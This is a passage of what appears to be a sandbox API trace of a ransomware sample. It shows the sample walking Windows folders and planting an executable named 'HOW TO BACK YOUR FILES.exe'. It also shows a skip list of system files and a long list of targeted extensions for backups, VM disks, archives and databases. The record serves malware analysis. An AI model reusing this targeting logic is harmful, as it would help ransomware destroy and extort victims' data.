(lpString1="en-US", lpString2="bootmgr") returned 1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0083.699] lstrlenW (lpString="en-US") returned 5 [0083.699] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned 60 [0083.699] lstrcpyW (in: lpString1=0x2cce476, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0083.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0083.699] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e95b0 [0083.699] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0083.699] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c362040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.699] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.699] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c362040, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0083.699] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.699] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0083.699] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0083.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0083.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0083.699] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 64 [0083.699] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0083.699] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.699] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.700] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.700] GetLastError () returned 0x0 [0083.700] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.700] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.700] CloseHandle (hObject=0x120) returned 1 [0083.700] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.700] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.700] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.700] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.700] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.701] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.701] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.701] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.701] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.701] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.701] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.701] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3881a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.701] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.701] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="aoldtz.exe") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2=".") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="..") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="windows") returned -1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="bootmgr") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="temp") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="pagefile.sys") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="boot") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="ids.txt") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="ntuser.dat") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="perflogs") returned 1 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2="MSBuild") returned 1 [0083.701] lstrlenW (lpString="WelcomeFax.tif") returned 14 [0083.701] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned 66 [0083.701] lstrcpyW (in: lpString1=0x2cce482, lpString2="WelcomeFax.tif" | out: lpString1="WelcomeFax.tif") returned="WelcomeFax.tif" [0083.701] lstrlenW (lpString="WelcomeFax.tif") returned 14 [0083.701] lstrlenW (lpString="Ares865") returned 7 [0083.701] lstrcmpiW (lpString1="Fax.tif", lpString2="Ares865") returned 1 [0083.701] lstrlenW (lpString=".dll") returned 4 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2=".dll") returned 1 [0083.701] lstrlenW (lpString=".lnk") returned 4 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2=".lnk") returned 1 [0083.701] lstrlenW (lpString=".ini") returned 4 [0083.701] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2=".ini") returned 1 [0083.701] lstrlenW (lpString=".sys") returned 4 [0083.702] lstrcmpiW (lpString1="WelcomeFax.tif", lpString2=".sys") returned 1 [0083.702] lstrlenW (lpString="WelcomeFax.tif") returned 14 [0083.702] lstrlenW (lpString="bak") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="bak") returned 1 [0083.702] lstrlenW (lpString="ba_") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="ba_") returned 1 [0083.702] lstrlenW (lpString="dbb") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="dbb") returned 1 [0083.702] lstrlenW (lpString="vmdk") returned 4 [0083.702] lstrcmpiW (lpString1=".tif", lpString2="vmdk") returned -1 [0083.702] lstrlenW (lpString="rar") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="rar") returned 1 [0083.702] lstrlenW (lpString="zip") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="zip") returned -1 [0083.702] lstrlenW (lpString="tgz") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="tgz") returned 1 [0083.702] lstrlenW (lpString="vbox") returned 4 [0083.702] lstrcmpiW (lpString1=".tif", lpString2="vbox") returned -1 [0083.702] lstrlenW (lpString="vdi") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="vdi") returned -1 [0083.702] lstrlenW (lpString="vhd") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="vhd") returned -1 [0083.702] lstrlenW (lpString="vhdx") returned 4 [0083.702] lstrcmpiW (lpString1=".tif", lpString2="vhdx") returned -1 [0083.702] lstrlenW (lpString="avhd") returned 4 [0083.702] lstrcmpiW (lpString1=".tif", lpString2="avhd") returned -1 [0083.702] lstrlenW (lpString="db") returned 2 [0083.702] lstrcmpiW (lpString1="if", lpString2="db") returned 1 [0083.702] lstrlenW (lpString="db2") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="db2") returned 1 [0083.702] lstrlenW (lpString="db3") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="db3") returned 1 [0083.702] lstrlenW (lpString="dbf") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="dbf") returned 1 [0083.702] lstrlenW (lpString="mdf") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="mdf") returned 1 [0083.702] lstrlenW (lpString="mdb") returned 3 [0083.702] lstrcmpiW (lpString1="tif", lpString2="mdb") returned 1 [0083.703] lstrlenW (lpString="sql") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="sql") returned 1 [0083.703] lstrlenW (lpString="sqlite") returned 6 [0083.703] lstrcmpiW (lpString1="ax.tif", lpString2="sqlite") returned -1 [0083.703] lstrlenW (lpString="sqlite3") returned 7 [0083.703] lstrcmpiW (lpString1="Fax.tif", lpString2="sqlite3") returned -1 [0083.703] lstrlenW (lpString="sqlitedb") returned 8 [0083.703] lstrcmpiW (lpString1="eFax.tif", lpString2="sqlitedb") returned -1 [0083.703] lstrlenW (lpString="xml") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="xml") returned -1 [0083.703] lstrlenW (lpString="$er") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="$er") returned 1 [0083.703] lstrlenW (lpString="4dd") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="4dd") returned 1 [0083.703] lstrlenW (lpString="4dl") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="4dl") returned 1 [0083.703] lstrlenW (lpString="^^^") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="^^^") returned 1 [0083.703] lstrlenW (lpString="abs") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="abs") returned 1 [0083.703] lstrlenW (lpString="abx") returned 3 [0083.703] lstrcmpiW (lpString1="tif", lpString2="abx") returned 1 [0083.703] lstrlenW (lpString="accdb") returned 5 [0083.703] lstrcmpiW (lpString1="x.tif", lpString2="accdb") returned 1 [0083.703] lstrlenW (lpString="accdc") returned 5 [0083.703] lstrcmpiW (lpString1="x.tif", lpString2="accdc") returned 1 [0083.703] lstrlenW (lpString="accde") returned 5 [0083.703] lstrcmpiW (lpString1="x.tif", lpString2="accde") returned 1 [0083.703] lstrlenW (lpString="accdr") returned 5 [0083.703] lstrcmpiW (lpString1="x.tif", lpString2="accdr") returned 1 [0083.703] lstrlenW (lpString="accdt") returned 5 [0083.703] lstrcmpiW (lpString1="x.tif", lpString2="accdt") returned 1 [0083.703] lstrlenW (lpString="accdw") returned 5 [0083.703] lstrcmpiW (lpString1="x.tif", lpString2="accdw") returned 1 [0083.704] lstrlenW (lpString="accft") returned 5 [0083.704] lstrcmpiW (lpString1="x.tif", lpString2="accft") returned 1 [0083.704] lstrlenW (lpString="adb") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="adb") returned 1 [0083.704] lstrlenW (lpString="adb") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="adb") returned 1 [0083.704] lstrlenW (lpString="ade") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="ade") returned 1 [0083.704] lstrlenW (lpString="adf") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="adf") returned 1 [0083.704] lstrlenW (lpString="adn") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="adn") returned 1 [0083.704] lstrlenW (lpString="adp") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="adp") returned 1 [0083.704] lstrlenW (lpString="alf") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="alf") returned 1 [0083.704] lstrlenW (lpString="ask") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="ask") returned 1 [0083.704] lstrlenW (lpString="btr") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="btr") returned 1 [0083.704] lstrlenW (lpString="cat") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="cat") returned 1 [0083.704] lstrlenW (lpString="cdb") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="cdb") returned 1 [0083.704] lstrlenW (lpString="ckp") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="ckp") returned 1 [0083.704] lstrlenW (lpString="cma") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="cma") returned 1 [0083.704] lstrlenW (lpString="cpd") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="cpd") returned 1 [0083.704] lstrlenW (lpString="dacpac") returned 6 [0083.704] lstrcmpiW (lpString1="ax.tif", lpString2="dacpac") returned -1 [0083.704] lstrlenW (lpString="dad") returned 3 [0083.704] lstrcmpiW (lpString1="tif", lpString2="dad") returned 1 [0083.704] lstrlenW (lpString="dadiagrams") returned 10 [0083.704] lstrcmpiW (lpString1="omeFax.tif", lpString2="dadiagrams") returned 1 [0083.705] lstrlenW (lpString="daschema") returned 8 [0083.705] lstrcmpiW (lpString1="eFax.tif", lpString2="daschema") returned 1 [0083.705] lstrlenW (lpString="db-journal") returned 10 [0083.705] lstrcmpiW (lpString1="omeFax.tif", lpString2="db-journal") returned 1 [0083.705] lstrlenW (lpString="db-shm") returned 6 [0083.705] lstrcmpiW (lpString1="ax.tif", lpString2="db-shm") returned -1 [0083.705] lstrlenW (lpString="db-wal") returned 6 [0083.705] lstrcmpiW (lpString1="ax.tif", lpString2="db-wal") returned -1 [0083.705] lstrlenW (lpString="dbc") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dbc") returned 1 [0083.705] lstrlenW (lpString="dbs") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dbs") returned 1 [0083.705] lstrlenW (lpString="dbt") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dbt") returned 1 [0083.705] lstrlenW (lpString="dbv") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dbv") returned 1 [0083.705] lstrlenW (lpString="dbx") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dbx") returned 1 [0083.705] lstrlenW (lpString="dcb") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dcb") returned 1 [0083.705] lstrlenW (lpString="dct") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dct") returned 1 [0083.705] lstrlenW (lpString="dcx") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dcx") returned 1 [0083.705] lstrlenW (lpString="ddl") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="ddl") returned 1 [0083.705] lstrlenW (lpString="dlis") returned 4 [0083.705] lstrcmpiW (lpString1=".tif", lpString2="dlis") returned -1 [0083.705] lstrlenW (lpString="dp1") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dp1") returned 1 [0083.705] lstrlenW (lpString="dqy") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dqy") returned 1 [0083.705] lstrlenW (lpString="dsk") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dsk") returned 1 [0083.705] lstrlenW (lpString="dsn") returned 3 [0083.705] lstrcmpiW (lpString1="tif", lpString2="dsn") returned 1 [0083.705] lstrlenW (lpString="dtsx") returned 4 [0083.705] lstrcmpiW (lpString1=".tif", lpString2="dtsx") returned -1 [0083.706] lstrlenW (lpString="dxl") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="dxl") returned 1 [0083.706] lstrlenW (lpString="eco") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="eco") returned 1 [0083.706] lstrlenW (lpString="ecx") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="ecx") returned 1 [0083.706] lstrlenW (lpString="edb") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="edb") returned 1 [0083.706] lstrlenW (lpString="epim") returned 4 [0083.706] lstrcmpiW (lpString1=".tif", lpString2="epim") returned -1 [0083.706] lstrlenW (lpString="fcd") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fcd") returned 1 [0083.706] lstrlenW (lpString="fdb") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fdb") returned 1 [0083.706] lstrlenW (lpString="fic") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fic") returned 1 [0083.706] lstrlenW (lpString="flexolibrary") returned 12 [0083.706] lstrcmpiW (lpString1="lcomeFax.tif", lpString2="flexolibrary") returned 1 [0083.706] lstrlenW (lpString="fm5") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fm5") returned 1 [0083.706] lstrlenW (lpString="fmp") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fmp") returned 1 [0083.706] lstrlenW (lpString="fmp12") returned 5 [0083.706] lstrcmpiW (lpString1="x.tif", lpString2="fmp12") returned 1 [0083.706] lstrlenW (lpString="fmpsl") returned 5 [0083.706] lstrcmpiW (lpString1="x.tif", lpString2="fmpsl") returned 1 [0083.706] lstrlenW (lpString="fol") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fol") returned 1 [0083.706] lstrlenW (lpString="fp3") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fp3") returned 1 [0083.706] lstrlenW (lpString="fp4") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fp4") returned 1 [0083.706] lstrlenW (lpString="fp5") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fp5") returned 1 [0083.706] lstrlenW (lpString="fp7") returned 3 [0083.706] lstrcmpiW (lpString1="tif", lpString2="fp7") returned 1 [0083.706] lstrlenW (lpString="fpt") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="fpt") returned 1 [0083.707] lstrlenW (lpString="frm") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="frm") returned 1 [0083.707] lstrlenW (lpString="gdb") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="gdb") returned 1 [0083.707] lstrlenW (lpString="gdb") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="gdb") returned 1 [0083.707] lstrlenW (lpString="grdb") returned 4 [0083.707] lstrcmpiW (lpString1=".tif", lpString2="grdb") returned -1 [0083.707] lstrlenW (lpString="gwi") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="gwi") returned 1 [0083.707] lstrlenW (lpString="hdb") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="hdb") returned 1 [0083.707] lstrlenW (lpString="his") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="his") returned 1 [0083.707] lstrlenW (lpString="ib") returned 2 [0083.707] lstrcmpiW (lpString1="if", lpString2="ib") returned 1 [0083.707] lstrlenW (lpString="idb") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="idb") returned 1 [0083.707] lstrlenW (lpString="ihx") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="ihx") returned 1 [0083.707] lstrlenW (lpString="itdb") returned 4 [0083.707] lstrcmpiW (lpString1=".tif", lpString2="itdb") returned -1 [0083.707] lstrlenW (lpString="itw") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="itw") returned 1 [0083.707] lstrlenW (lpString="jet") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="jet") returned 1 [0083.707] lstrlenW (lpString="jtx") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="jtx") returned 1 [0083.707] lstrlenW (lpString="kdb") returned 3 [0083.707] lstrcmpiW (lpString1="tif", lpString2="kdb") returned 1 [0083.707] lstrlenW (lpString="kexi") returned 4 [0083.707] lstrcmpiW (lpString1=".tif", lpString2="kexi") returned -1 [0083.707] lstrlenW (lpString="kexic") returned 5 [0083.707] lstrcmpiW (lpString1="x.tif", lpString2="kexic") returned 1 [0083.707] lstrlenW (lpString="kexis") returned 5 [0083.707] lstrcmpiW (lpString1="x.tif", lpString2="kexis") returned 1 [0083.707] lstrlenW (lpString="lgc") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="lgc") returned 1 [0083.708] lstrlenW (lpString="lwx") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="lwx") returned 1 [0083.708] lstrlenW (lpString="maf") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="maf") returned 1 [0083.708] lstrlenW (lpString="maq") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="maq") returned 1 [0083.708] lstrlenW (lpString="mar") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mar") returned 1 [0083.708] lstrlenW (lpString="marshal") returned 7 [0083.708] lstrcmpiW (lpString1="Fax.tif", lpString2="marshal") returned -1 [0083.708] lstrlenW (lpString="mas") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mas") returned 1 [0083.708] lstrlenW (lpString="mav") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mav") returned 1 [0083.708] lstrlenW (lpString="maw") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="maw") returned 1 [0083.708] lstrlenW (lpString="mdbhtml") returned 7 [0083.708] lstrcmpiW (lpString1="Fax.tif", lpString2="mdbhtml") returned -1 [0083.708] lstrlenW (lpString="mdn") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mdn") returned 1 [0083.708] lstrlenW (lpString="mdt") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mdt") returned 1 [0083.708] lstrlenW (lpString="mfd") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mfd") returned 1 [0083.708] lstrlenW (lpString="mpd") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mpd") returned 1 [0083.708] lstrlenW (lpString="mrg") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mrg") returned 1 [0083.708] lstrlenW (lpString="mud") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mud") returned 1 [0083.708] lstrlenW (lpString="mwb") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="mwb") returned 1 [0083.708] lstrlenW (lpString="myd") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="myd") returned 1 [0083.708] lstrlenW (lpString="ndf") returned 3 [0083.708] lstrcmpiW (lpString1="tif", lpString2="ndf") returned 1 [0083.708] lstrlenW (lpString="nnt") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="nnt") returned 1 [0083.709] lstrlenW (lpString="nrmlib") returned 6 [0083.709] lstrcmpiW (lpString1="ax.tif", lpString2="nrmlib") returned -1 [0083.709] lstrlenW (lpString="ns2") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="ns2") returned 1 [0083.709] lstrlenW (lpString="ns3") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="ns3") returned 1 [0083.709] lstrlenW (lpString="ns4") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="ns4") returned 1 [0083.709] lstrlenW (lpString="nsf") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="nsf") returned 1 [0083.709] lstrlenW (lpString="nv") returned 2 [0083.709] lstrcmpiW (lpString1="if", lpString2="nv") returned -1 [0083.709] lstrlenW (lpString="nv2") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="nv2") returned 1 [0083.709] lstrlenW (lpString="nwdb") returned 4 [0083.709] lstrcmpiW (lpString1=".tif", lpString2="nwdb") returned -1 [0083.709] lstrlenW (lpString="nyf") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="nyf") returned 1 [0083.709] lstrlenW (lpString="odb") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="odb") returned 1 [0083.709] lstrlenW (lpString="odb") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="odb") returned 1 [0083.709] lstrlenW (lpString="oqy") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="oqy") returned 1 [0083.709] lstrlenW (lpString="ora") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="ora") returned 1 [0083.709] lstrlenW (lpString="orx") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="orx") returned 1 [0083.709] lstrlenW (lpString="owc") returned 3 [0083.709] lstrcmpiW (lpString1="tif", lpString2="owc") 